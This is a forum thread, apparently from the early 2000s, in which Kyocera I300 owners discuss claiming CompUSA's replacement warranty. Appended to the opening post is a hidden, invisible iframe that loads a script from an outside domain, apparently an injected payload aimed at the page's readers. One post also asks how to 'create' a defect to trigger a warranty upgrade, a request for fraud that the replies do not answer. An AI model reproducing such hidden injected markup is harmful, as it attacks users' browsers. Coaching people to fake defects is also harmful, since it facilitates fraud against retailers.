+ Reply to Thread

Date of Release for I300

Anyone know the data that the first I300's hit stores. I bought it the first day CompUSA had them and can't find my reciept. Gotta make sure my 1yr replacement doesn't go up before I use it. Thanks for you help in advance.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You can call compUSA and they should be able to look up your receipt, as long as you hopefully didn't pay cash.
    --
    if dreams are like movies
    then memories are films about ghosts

I bought the firstand only one that my CompUSA store had at that time (they didnt even know that they had it until I insisted that they check the computer and that was Oct. 8th, 2001
    michaelb92

I-300 Novice

Comp USA Warranty Trigger

There are many forum members out there with I-300s and the Comp USA warranty (like me). Two questions:

1. What is the most efficient way to 'create' a defect necessary to use the warranty for an upgrade?

2. How do you go about claiming the warranty replacement but get to a Kyocera 7135 instead of an I-330?

I know there is someone on this forum that has already worked out the logistics of this move....so help us 'slower' members out!
    Ahmed V. Ismail
    A Smartphone Addict

I used to work for a store like CompUSA (Circuit City) and I did a lot of shopping around at the competition. It seems as though most of the retailers are cool about giving you your credit back, not exactly swapping the phone apples for apples, so to speak. We have customers come in all the time w/those replacement guarantees/warranties, whatever you want to call em, and half the time that exact phone doesn't even exist anymore, or at least stores don't carry it so how are they going to replace THAT phone? THis is a longer explanation than it needs to be: more often than not the stores will be good about giving you your purchase price back, obviously as store credit, towards purchase of another phone. Just ask nicely, don't be a **** unless they start treating you like crap first, and you should be fine.
    --

I dont mean to bash CircuitCity, but there are two in my area. At one of them, they treat you like crap, even if a legitimate warranty issue has arisen with your phone. One time, the customer service "jackass" accused me of trying to "Scam [his] store."

Anyhow, I always thought the warranty plans at CompUSA and BestBuy were the repair-three-times-then-replace style of warranty, not a direct swap the first time you complain?

Not on cell phones, I don't think. I know best buy's isn't. The warranties work very differently depending on products, across all three of these major electronic retailers. Like computers, they repair. Scanners/printers, straight swap. Know what else you could do: call them and say you're shopping around for cell phones, but how the store's warranty/service/replacement program works is very important to you. Ask what their policy is, they'll probably be more than happy to explain the whole thing and give you their name. (CompUSA is on commission just like Circuit, too) And not to bash Circuit City myself or anything, but that is THE ABSOLUTE WORST COMPANY I have EVER worked for. And I've worked a fast food chain at a summer festival. Hope this helps.
    --